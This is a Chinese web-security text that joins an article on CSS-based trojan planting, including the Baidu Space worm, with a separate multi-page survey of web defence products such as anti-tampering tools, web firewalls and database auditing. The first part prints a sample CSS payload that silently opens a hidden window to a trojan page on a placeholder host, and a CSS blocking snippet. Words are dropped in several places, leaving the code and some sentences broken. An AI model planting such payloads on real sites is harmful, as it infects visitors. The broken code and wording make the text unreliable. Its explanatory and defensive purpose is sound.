随着Web2.0的普及，各种网页特效用得越来越多，这也给黑客一个可乘之机。他们发现，用来制作网页特效的CSS代码，也可以用来挂马。而比较讽刺的是，CSS挂马方式其实是从防范E挂马的CSS代码演变而来。

安天实验室阿楠：安全工程师，从事病毒分析多年。

网站挂马的手段最初非常单一，但是随着Web2.0技术以及Blog、Wiki等广泛的应用，挂马也涌现出各种各样的技术，其中CSS挂马方式，可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。

在我印象中，记忆最深刻的一次是百度空间CSS挂马。当时，百度空间推出没有多久，就有许多百度用户收到了类似“哈，节日快乐呀!热烈庆祝2008，心情好好，记住要想我!http://hi.baidu.com/XXXXX”的站内消息。

由于网址是百度空间的网址，许多用户认为不会存在安全问题，加上又有可能是自己朋友发来的，因此会毫不犹豫地点击进入。但是进入指定的网址后，用户就会感染蠕虫病毒，并继续传播。

由于蠕虫扩散非常严重，最终导致百度空间不得不发布官方声明提醒用户，并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是百度空间CSS模板功能，通过变形的expression在CSS代码中动态执行脚本，让指定的远程恶意代码文件在后台悄悄运行并发送大量伪造信息。

我建议大家在点击陌生链接时，要多个心眼，大网站也是可能被挂马的。大家在上网时，最好还是使用一些带网页木马拦截功能的安全辅助工具。

黑客为什么选择CSS挂马?

在Web1.0时代，使用E挂马对于黑客而言，与其说是为了更好地实现木马的隐藏，倒不如说是无可奈何的一个选择。在简单的HTML网页和缺乏交互性的网站中，黑客可以利用的手段也非常有限，即使采取了复杂的伪装，也很容易被识破，还不如E来得直接和有效。

但如今交互式的Web2.0网站越来越多，允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中，往往会提供丰富的功能，并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改，这促使了CSS挂马流行。

小百科：

CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。

黑客在利用CSS挂马时，往往是借着网民对某些大网站的信任，将CSS恶意代码挂到博客或者其他支持CSS的网页中，当网民在访问该网页时恶意代码就会执行。这就如同你去一家知名且证照齐全的大医院看病，你非常信任医院，但是你所看的门诊却已经被庸医外包了下来，并且打着医院的名义利用你的信任成功欺骗了你。但是当你事后去找人算账时，医院此时也往往一脸无辜。对于安全工程师而言，CSS挂马的排查是必备常识。

CSS挂马攻防实录

攻CSS挂马方式较多，但主流的方式是通过有漏洞的博客或者SNS社交网站系统，将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。

方式1：

Body

“background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式，这段恶意代码主要是通过“background-image”配合t代码让网页木马悄悄地在用户的电脑中运行。

那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置，然后将该段恶意代码写入挂马网站的网页中，或者挂马网页所调用的CSS文件中。

小百科：

使用Body对象元素，主要是为了让对象不再改变整个网页文档的内容，通过Body对象的控制，可以将内容或者效果控制在指定的大小内，如同使用DIV对象那样精确地设置大小。

方式2：

Body

background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))

方式1的CSS挂马技术，在运行时会出现空白的页面，影响网页访问者正常的访问，因此比较容易发现。不过在方式2中的这段代码，使用了t的Open开窗，通过新开一个隐藏的窗口，在后台悄悄地运行新窗口并激活访问网页溢出木马页面，不会影响访问者观看网页内容，因此更加隐蔽。

防网络服务器被挂马，通常会出现防病毒软件告警之类的信息。由于漏洞不断更新，挂马种类时刻都在变换，通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志，发现异常信息，经常检查网站代码，使用网页木马检测系统，进行排查。

目前除了使用以前的阻断弹出窗口防范CSS挂马之外，还可以在网页中设置CSS过滤，将CSS过滤掉。不过如果你选择过滤CSS的话，首先需要留意自己的相关网页是否有CSS的内容，因此我们仍然首推用阻断方式来防范CSS。阻断代码如下所示：

emiao1:expression(this.src="about:blank"，this.outerHTML="");

将外域的木马代码的src重写成本地IE404错误页面的地址，这样，外域的t代码不会被下载。不过阻断方式也有天生致命的弱点，弱点的秘密我们将于下次揭晓。

　　Web服务是指采用B/S架构、通过Http协议提供服务的统称，这种结构也称为Web架构，随着Web2.0的发展，出现了数据与服务处理分离、服务与数据分布式等变化，其交互性能也大大增强，也有人叫B/S/D三层结构。互联网能够快速流行得益于Web部署上的简单，开发上简便，Web网页的开发大军迅速超过了以往任何计算机语言的爱好者，普及带来了应用上繁荣。J2EE与.NET的殊途同归，为Web流行扫清了厂家与标准的差异；众望所归，SOA选中Web2.0作为其实现的基本工具之一(使用最广的)，Web架构从互联网走进了企业内部网络，新业务系统的开发，越来越多的系统架构师选择了Web架构，与熟悉它的人如此广泛是分不开的。事实再一次证明了那个经典的理论：简洁的最容易流行。

　　简单与安全好象总有些“矛盾”，浏览器可以直接看到页面的Html代码，早期的Web服务设计没有过多的安全考虑，人性本善，技术人员总是相信人都是善良的！但随着Web2.0的广泛使用，Web服务不再只是信息发布，游戏中的装备交易、日常生活中网上购物、政府行政审批、企业资源管理…信息价值的诱惑，人的贪婪开始显现，不是所有的人都有Web设计者的“大同”思想，安全问题日显突出了。

　　2008年网络安全事件统计最多是：SQL注入与“网页挂马(木马)”。因为这是“僵尸”网络发展新“会员”的基本工具，而僵尸网络的经济与政治“价值”，这里就不用说了。SQL注入与“网页挂马”主要就是针对Web服务的，传统的安全产品(UTM/IPS)都有些力不从心。

　　互联网是个人思想展现的乐园，也是世界级的、虚拟的“另一个”社会，既然大家都是虚拟的、带着面具的，要变成现实社会中的真实利益，还需要一些转换才可以兑现，但SOA把Web架构带入企业内部网络，这里的网络世界是“真实的”，利益是可以直接兑现的，Web安全问题变得刻不容缓。

　　二、Web架构原理

　　要保护Web服务，先要了解Web系统架构，下图是Web服务的一般性结构图，适用于互联网上的网站，也适用于企业内网上的Web应用架构：

　　通常情况下，用户要访问的页面都存在Web服务器的某个固定目录下，是一些.html或.xml文件，用户通过页面上的“超连接”(其实就是URL地址)可以在网站页面之间“跳跃”，这就是静态的网页。后来人们觉得这种方式只能单向地给用户展示信息，信息发布还可以，但让用户做一些比如身份认证、投票选举之类的事情就比较麻烦，由此产生了动态网页的概念；所谓动态就是利用flash、Php、asp、Java等技术在网页中嵌入一些可运行的“小程序”，用户浏览器在解释页面时，看到这些小程序就启动运行它。小程序的用法很灵活，可以展示一段动画(如Flash)，也可以在你的PC上生成一个文件，或者接收你输入的一段信息，这样就可以根据你的“想法”，对页面进行定制处理，让你每次来到时，看到的是你上次设计好的特有风格，“贵宾的感觉”是每个人都喜欢的，更何况虚拟的网络世界中，你不认识的人还对你如此“敬仰”，服务得如此体贴…

　　“小程序”的使用让Web服务模式有了“双向交流”的能力，Web服务模式也可以象传统软件一样进行各种事务处理，如编辑文件、利息计算、提交表格等，Web架构的适用面大大扩展，Web2.0可以成为SOA架构的实现技术之一，这个“小程序”是功不可没的。

　　这些“小程序”可以嵌入在页面中，也可以以文件的形式单独存放在Web服务器的目录里，如.asp、.php、jsp文件等，并且可以在开发时指定是在用户端运行，还是在服务器端运行；用户不再能看到这些小程序的源代码，服务的安全性也大大提高。这样功能性的小程序越来越多，形成常用的工具包，单独管理，Web业务开发时，直接使用就可以了，这就是中间件服务器，它实际上是Web服务器处理能力的扩展。

　　静态网页与“小程序”都是事前设计好的，一般不经常改动，但网站上很多内容需要经常的更新，如新闻、博客文章、互动游戏等，这些变动的数据放在静态的程序中显然不适合，传统的办法是数据与程序分离，采用专业的数据库。Web开发者在Web服务器后边增加了一个数据库服务器，这些经常变化的数据存进数据库，可以随时更新。当用户请求页面时，“小程序”根据用户要求的页面，涉及到动态数据的地方，利用SQL数据库语言，从数据中读取最新的数据，生成“完整”页面，最后送给用户，如股市行情曲线，就是由一个不断刷新的小程序控制。

　　除了应用数据需要变化，用户的一些状态信息、属性信息也需要临时记录(因为每个用户都是不同的)，而Web服务器本来是不记录这些信息的，只管答复你的要求，“人一走茶就凉了”。后来Web技术为了“友好”互动，需要“记住”用户的访问信息，建立了一些“新”的通讯机制：?

　　Cookie：把一些用户的参数，如帐户名、口令等信息存放在客户端的硬盘临时文件中，用户再次访问这个网站时，参数也一同送给服务器，服务器就知道你就是上次来的那个“家伙”了?

　　Session：把用户的一些参数信息存在服务器的内存中，或写在服务器的硬盘文件中，用户是不可见的，这样用户用不同电脑访问时的贵宾待遇就同样了，Web服务器总能记住你的“样子”，一般情况下，Cookie与Session可以结合使用

　　Cookie在用户端，一般采用加密方式存放就可以了；Session在服务器端，信息集中，被篡改问题将很严重，所以一般放在内存里管理，尽量不存放在硬盘上。

　　到此，我们清楚了，Web服务器上有两种服务用数据要保证“清白”，一是页面文件(.html、.xml等)，这里包括动态程序文件(.php、.asp、.jsp等)，一般存在Web服务器的特定目录中，或是中间间服务器上；二是后台的数据库，如Oracle、SQLServer等，其中存放的数据的动态网页生成时需要的，也有业务管理数据、经营数据。

　　还有一个问题应该提一下，就是浏览器给用户电脑带来的安全问题，因为Web可以对本地的进程、硬盘操作，可以把木马、病毒放到你的电脑上来，Web架构中使用“沙漏”技术提供安全保护，就是限制页面中“小程序”的本地读写权限，但限制毕竟不能不让其“工作”，所以多数情况下在写入时给出提示，让你自己选择，大家经常看见有进程在安装程序进入你的电脑，但绝大多数人分不清是否应该，要么一概不许，造成很多事情做不了(很多下载与游戏就只能看着)，要么“大胆”接受，大门敞开，听天由命。这里主要分析服务器端的安全，客户端的安全再行考虑。

　　共7页: 1 234567

　　内容导航

　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析

　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品

　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具

　　第 7 页：新的想法主机Web网关

　　 三、Web架构中的安全点分析

　　从Web架构上可以看出，Web服务器是必经的大门，进了大门，还有很多服务器需要保护，如中间件服务器、数据库服务器等。我们这里不考虑网络内部人员的攻击，只考虑从接入网(或互联网)来的攻击，入侵者入侵的通道有下面几个：

　　1、服务器系统漏洞：Web服务器毕竟的一个通用的服务器，无论是Windows，还是Linux/Unix，都不可少的带有系统自身的漏洞，通过这些漏洞入侵，可以获得服务器的高级权限，当然对服务器上运行的Web服务就可以随意控制了。除了OS的漏洞，还有Web服务软件的漏洞，IIS也好，Tomcat也好，同样需要不断地打补丁。

　　2、Web服务应用漏洞：如果说系统级的软件漏洞被关注的人太多了，那么Web应用软件的漏洞数量上就更多了，因为Web服务开发简单，开发的团队参差不齐，并非都是“专业”的高手，编程不规范、安全意识不强、因为开发时间紧张而简化测试等，应用程序的漏洞也同样可以让入侵者来去自如。最为常见的SQL注入，就是因为大多应用编程过程中产生的漏洞。

　　3、密码暴力破解：漏洞会招来攻击容易理解，但毕竟需要高超的技术水平，破解密码却十分有效，而且简单易行。一般来说帐号信息容易获得，剩下的就是猜测密码了，由于使用复杂密码是件麻烦而又“讨厌”的事，设置容易记忆的密码，是绝大多数用户的选择。大多Web服务是靠“帐号+密码”的方式管理用户帐户，一旦破解密码，尤其是远程管理者的密码，破坏程度难以想象，并且其攻击难度比通过漏洞方式要简单的多，而且不容易被发觉。在知名的网络经济案例中，通过密码入侵的占了接近一半的比例。

　　入侵者进入Web系统，其动作行为目的性是十分明确的：

　　?

　　让网站瘫痪：网站瘫痪是让服务中断。使用DDOS攻击都可以让网站瘫痪，但对Web服务内部没有损害，而网络入侵，可以删除文件、停止进程，让Web服务器彻底无法恢复。一般来说，这种做法是索要金钱或恶意竞争的要挟，也可能是显示他的技术高超，拿你的网站被攻击作为宣传他的工具。

　　篡改网页：修改网站的页面显示，是相对比较容易的，也是公众容易知道的攻击效果，对于攻击者来说，没有什么“实惠”好处，主要是炫耀自己，当然对于政府等网站，形象问题是很严重的。?

　　挂木马：这种入侵对网站不产生产生直接破坏，而是对访问网站的用户进行攻击，挂木马的最大“实惠”是收集僵尸网络的“肉鸡”，一个知名网站的首页传播木马的速度是爆炸式的。挂木马容易被网站管理者发觉，XSS(跨站攻击)是新的倾向。?

　　篡改数据：这是最危险的攻击者，篡改网站数据库，或者是动态页面的控制程序，表面上没有什么变化，很不容易发觉，是最常见的经济利益入侵。数据篡改的危害是难以估量的，比如：购物网站可以修改你帐号金额或交易记录，政府审批网站可以修改行政审批结果，企业ERP可以修改销售定单或成交价格…有人说采用加密协议可以防止入侵，如https协议，这种说法是不准确的。首先Web服务是面向大众的，不可以完全使用加密方式，在企业内部的Web服务上可以采用，但大家都是“内部人员”，加密方式是共知的；其次，加密可以防止别人“窃听”，但入侵者可以冒充正规用户，一样可以入侵；再者，“中间人劫持”同样可以窃听加密的通讯。

　　共7页: 12 3456[7]

　　内容导航

　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析

　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品

　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具

　　第 7 页：新的想法主机Web网关

　　 四、Web安全产品分析

　　围绕Web服务的安全，产品可以说五花八门，最基本的是接入网入口的UTM网关，其中IPS功能与防DDOS功能是Web服务器系统级入侵的直接防护，但UTM是通用的边界安全网关，非“专业的”Web入侵防护，一般作为安全的入门级防护，这里不细说。这里主要分析专为Web服务开发的安全产品，大概有下面几方面的产品：

　　1、网页防篡改产品：

　　防护未知攻击是难的，但看好我自己的“家底”是相对容易的。因此，人们最先想到的就是网页防篡改技术，保持自己的“纯洁”，起码对社会不会造成大危害。网页被篡改产品出现在Web早期，几经风雨，各厂家技术逐渐统一。网页防篡改技术的基本原理：是对Web服务器上的页面文件(目录下文件)进行监控，发现有更改及时恢复。所以该产品实际是一个“修补”的工具，不能阻止攻击者的篡改，就来个守株待兔，专人看守，减少损失是目标，防篡改属于典型的被动防护技术。

　　网页防篡改产品的部署：建立一台单独的管理服务器(Web服务器数量少可以省略)，然后在每台Web服务器上安装一个Agent程序，负责该服务器的“网页文件看护”，管理服务器是管理这些Agent看护策略的。

　　我们先分析一下“页面文件看护”技术的变迁：

　　b)第二代技术，采用了Hash算法，对主目录下的每个文件做Hash，生成该文件的“指纹”，定时循环进程直接计算服务用文件的Hash指纹，然后进行指纹核对，指纹一般比较小，比较方便；指纹具有不可逆的特点，不怕仿制。

　　c)第三代技术，既然网站上页面太多，三级以下页面的访问量，一般使用呈指数级下降，没人访问当然也不会被篡改，在这些页面重复扫描是不划算的。改变一下思路：对文件读取应该没有危险，危险的是对文件的改写操作。若只对文件被改变时才做检查，就可以大大降低对服务器资源的占用；具体做法是：开启一个看守进程，对Web服务器的主目录文件删改操作进行监控，发现有此操作，判断是否有合法身份，是否为授权的维护操作，否则阻断其执行，文件不被改写，也就起到了网页防篡改的目的。这个技术也称为事件触发防篡改。

　　这种技术需要考验对服务器操作系统的熟悉程度，但黑客也是高手，你的看护进程是用户级的，黑客可以获得高级权限，绕过你的“消息钩子”，监控就成了摆设。

　　d)第四代技术，既然是比谁的进程权限高，让操作系统干这个活儿，应该是最合适的，黑客再牛也不可能越过操作系统自己“干活”。因此，在Windows系统中，提供系统级的目录文件修改看护进程(系统调用)，防篡改产品直接调用就可以了，或者利用操作系统自身的文件安全保护功能，对主目录文件进行锁定(Windows对自己系统的重要文件也采取了类似的防篡改保护，避免病毒的侵扰)，只允许网站发布系统(网页升级更新)才可以修改文件，其他系统进程也不允许删改。

　　这个方法应该说比较彻底，但可以看出，以后防篡改技术将成为操作系统的“专利”了，安全厂家实在是不愿意看到的。好在目前Linux还没有支持。

　　网页防篡改系统可以用于Web服务器，也可以用于中间件服务器，其目的都是保障网页文件的完整性。

　　网页防篡改对保护静态页面有很好的效果，但对于动态页面就没有办法了，因为页面是用户访问时生成的，内容与数据库相关。很多SQL注入就是利用这个漏洞，可以继续入侵Web服务器。

　　到目前为止，很多网页防篡改产品中都提供了一个IPS软件模块，用来阻止来针对Web服务的SQL注入、XML注入攻击。如国内厂家的WebGuard、iGuard、InforGuard等产品。

　　共7页: 123 4567

　　内容导航

　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析

　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品

　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具

　　第 7 页：新的想法主机Web网关

　　 2、Web防火墙产品：

　　防止网页被篡改是被动的，能阻断入侵行为才是主动型的，前边提到的IPS/UTM等产品是安全通用的网关，也有专门针对Web的硬件安全网关，国内的如：绿盟的Web防火墙，启明的WIPS(webIPS)，国外的有imperva的WAF(WebApplication Firewall)等。

　　Web防火墙产品部署在Web服务器的前面，串行接入，不仅在硬件性能上要求高，而且不能影响Web服务，所以HA功能、Bypass功能都是必须的，而且还要与负载均衡、WebCache等Web服务器前的常见的产品协调部署。

　　Web防火墙的主要技术的对入侵的检测能力，尤其是对Web服务入侵的检测，不同的厂家技术差别很大，不能以厂家特征库大小来衡量，主要的还是看测试效果，从厂家技术特点来说，有下面几种方式：?

　　代理服务：代理方式本身就是一种安全网关，基于会话的双向代理，中断了用户与服务器的直接连接，适用于各种加密协议，这也是Web的Cache应用中最常用的技术。代理方式防止了入侵者的直接进入，对DDOS攻击可以抑制，对非预料的“特别”行为也有所抑制。Netcontinuum(梭子鱼)公司的WAF就是这种技术的代表。?

　　特征识别：识别出入侵者是防护他的前提。特征就是攻击者的“指纹”，如缓冲区溢出时的Shellcode，SQL注入中常见的“真表达(1=1)”…应用信息没有“标准”，但每个软件、行为都有自己的特有属性，病毒与蠕虫的识别就采用此方式，麻烦的就是每种攻击都自己的特征，数量比较庞大，多了也容易相象，误报的可能性也大。虽然目前恶意代码的特征指数型地增长，安全界声言要淘汰此项技术，但目前应用层的识别还没有特别好的方式。?

　　算法识别：特征识别有缺点，人们在寻求新的方式。对攻击类型进行归类，相同类的特征进行模式化，不再是单个特征的比较，算法识别有些类似模式识别，但对攻击方式依赖性很强，如SQL注入、DDOS、XSS等都开发了相应的识别算法。算法识别是进行语义理解，而不是靠“长相”识别。?

　　模式匹配：是IDS中“古老”的技术，把攻击行为归纳成一定模式，匹配后能确定是入侵行为，当然模式的定义有很深的学问，各厂家都隐秘为“专利”。协议模式是其中简单的，是按标准协议的规程来定义模式；行为模式就复杂一些，

　　Web防火墙最大的挑战是识别率，这并不是一个容易测量的指标，因为漏网进去的入侵者，并非都大肆张扬，比如给网页挂马，你很难察觉进来的是那一个，不知道当然也无法统计。对于已知的攻击方式，可以谈识别率；对未知的攻击方式，你也只好等他自己“跳”出来才知道。

　　“自学习”功能的发展：

　　Imperva公司的WAF产品在提供入侵防护的同时，还提供了另外一个安全防护技术，就是对Web应用网页的自动学习功能，由于不同的网站不可能一样，所以网站自身页面的特性没有办法提前定义，所以imperva采用设备自动预学习方式，从而总结出本网站的页面的特点。具体的做法是这样的：

　　通过一段时间的用户访问，WAF记录了常用网页的访问模式，如一个网页中有几个输入点，输入的是什么类型的内容，通常情况的长度是多少…学习完毕后，定义出一个网页的正常使用模式，当今后有用户突破了这个模式，如一般的帐号输入不应该有特殊字符，而XML注入时需要有“<”之类的语言标记，WAF就会根据你预先定义的方式预警或阻断；再如密码长度一般不超过20位，在SQL注入时加入代码会很长，同样突破了网页访问的模式。

　　网页自学习技术，从Web服务自身的业务特定角度入手，不符合我的常规就是异常的，也是入侵检测技术的一种，比起单纯的Web防火墙来，不仅给入侵者“下通缉令”，而且建立进入自家的内部“规矩”，这一种双向的控制，显然比单向的要好。

　　Citrix公司收购了Teros后，推出的应用防火墙通过分析双向流量来学习Web服务的用户行为模式，建立了若干用户行为模型，一但匹配上你是某个行为，就按该模式行为去衡量你的行为做法，有“越轨”企图立即给予阻断。这个自适应学习引擎与Imperva公司的网页自学习有些类似，不过一个重点是学习网页特点，一个是学习用户访问的规律。

　　从安全角度来说，网业自学习技术与入侵防护结合使用，是理想的选择。

　　Web防火墙的未来出路：

　　有一种说法：因为Web服务器前的负载均衡设备、Web加速设备是不可缺少的，又是Web服务器群的出口必经之路，所以Web防火墙的功能有可能与这些设备合并。这种发展趋势有些象网关UTM与单独的FW、IPS、AV、VPN等设备进化发展一样，UTM就是这些网关的集合产品。

　　但我有一个不同的看法：UTM部署于网络的外连接出口，一般是互联网出口，其网络安全隔离作用，这里的带宽价格昂贵，所以拥有大带宽的用户很有限，而Web服务器群是与网络主交换机连接的，提供的是应用处理能力，要求的参数常是并发用户的数量与在线用户的数量，服务器一般都是千兆接口，目前的交换机就可达到几十个TB的交换能力，在大流量链路上做多功能的安全产品，又是应用层的检测，对产品的硬件压力是巨大的，能达到“线性”流量的产品一定价格昂贵，因此Web防火墙的这种合并思路是有待商榷的。

　　共7页: 1234 567

　　内容导航

　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析

　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品

　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具

　　第 7 页：新的想法主机Web网关

　　 3、Web数据库审计产品：

　　有效恢复是安全保障的一个很重要的理念。我们提到动态网页的防护难点是用数据库现场生成的，因此对数据库的修改就变得很关键，Web数据库审计产品的目的就是对数据的所有操作进行记录，当发现问题时，这些操作可以回溯。打个比方，你在游戏中的装备被别人给“划走”了，过了一周，你发现了，但一周中，游戏在继续，你的装备有很多新动态，合理与不合理变化交织在一起。此时，若管理人员知道确定是“某人”的篡改，就可以把他的动作进行“逆向”操作，你的游戏仍可以继续，不受影响；若通过协商，需要恢复到篡改前的某个状态，则在数据库中先取得篡改前最近一次的备份数据，再使用数据库的审计记录，一直“操作”到篡改前的状态，游戏就可以继续了。这种技术与数据库的实时同步备份技术是类似的。

　　当然数据库的操作量很大，全部记录需要很大的数据空间，所以，Web服务中重要数据库操作才进行详细审计，审计的目的是为了运营状态的可恢复。常见的Web审计数据：?

　　帐户操作：涉及权限的改变?

　　运营操作：涉及“财与物”的变化?

　　维护操作：涉及“特殊权限”人的动作

　　Web数据库审计产品一般采用旁路部署，不影响数据库的业务效率。若在业务流量不很大的情况下，可以采用Agent的软件方式，但是不建议完全依靠数据库自身的日志功能，因为，入侵者破坏后一定有“抹去痕迹”的步骤，痕迹一般就是系统本身的日志，单独的审计机制保障了日志的完整性。

　　共7页: 12345 6[7]

　　内容导航

　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析

　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品

　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具

　　第 7 页：新的想法主机Web网关

　　 4、Web木马检查工具：

　　Web安全不仅是维护网站自己安全，通过网站入侵用户电脑的危害也十分棘手。网页容易被挂上木马，或被XSS攻击利用，是否有工具可以对所有的网页进行安全检查呢？这里用到了“爬虫”技术。

　　“爬虫”技术最早是搜索引擎“发明”的，搜索网站放出N个小“爬虫”，在世界各地的网站上循环扫描，收集网站上的新信息，建立供世界人民查找的数据库，这样大家就可以从Google、百度等搜索门户上搜到你想要的任何东东。由于“爬虫”来自网站外部，所以可以模拟用户打开网站的实际效果，所以“爬虫”很快被网站用来测试自身性能的“用户体验”工具，比如网页打开的速度，用户互动的等待时间等。作为用户体验工具，“爬虫”很快也在企业内部网络上开始流行，关注用户感受，是08年开始IT领域内最流行的开发理念。

　　Web木马检查工具一般作为安全服务检查使用，也可以单独部署一台服务器，定期对网站检查，发现问题及时报警。该工具目前市场上的产品化很少，一般不销售，网上有些免费的类似软件可以试用，随着Web服务在企业内的应用增多，该工具应该象防病毒检查工具一样流行。

　　共7页: 123456 7

　　内容导航

　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析

　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品

　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具

　　第 7 页：新的想法主机Web网关

　　 五、新的想法主机Web网关

　　Web服务是从互联网技术发展起来，互联网是“草根”文化的集大成者。在互联网中，共享智慧是追求，简捷实用是方法。

　　很常见的现象，Web服务的处理能力采用集群技术、云计算技术，都是利用物美价廉的PC服务器集成在一起，而不是选用“庞大”的巨型机。P2P技术、CDN技术都是网民降低Web服务中心压力，而又能支持大用户、实时流媒体业务的“互联网Web技术”。但这也为Web业务的安全防护带来问题网络结构问题。为了提供处理能力，众多的服务器“网”一样地接在核心交换机上，在服务器前没有汇聚点，web防火墙的部署就成了问题。

　　草根文化的特点就是系统避免过渡依赖某一个点(大家都是重要的)。Web服务不同于传统银行模式的集中处理，服务器是PCServer组成的群，由于加入与离开群，对群的服务没有影响，只是服务处理能力的动态变化而已，所以服务器群中的每个服务器的处理能力相对不是那么宝贵，某个服务器的异常宕机也只是对个别的用户服务有些“临时影响”，在服务器中安装Agent的“恐惧”，Web服务管理者应该是没有的。

　　为了与“群”或“云”等Web新型网状结构相适应，Web服务应用层的防护，可以与网页防篡改合起来(尤其是OS提供底层的文件修改监控)，我们给它一个新的名字主机Web网关(HostWebGateway)。

　　主机Web网关的部署与防篡改产品一样，以Agent的形式嵌入到Web服务器中，不需要再关心Web服务的网络结构，同时，也避免了在Web服务使用加密协议时，网关安全设备对应用层攻击无能为力的弊端。

　　主机Web网关的主要功能：

　　?

　　Web应用入侵防护(SQL注入、XSS等)?

　　页面文件防篡改? Web网页自动学习功能?

　　Web用户访问行为的自学习功能

　　至于系统级的入侵防护与DDOS防护，放在UTM/IPS中解决，Web服务的网络结构就灵活多了。主机Web网关采用软件形式，没有了串行设备的性能要求，部署的成本也会大大下降。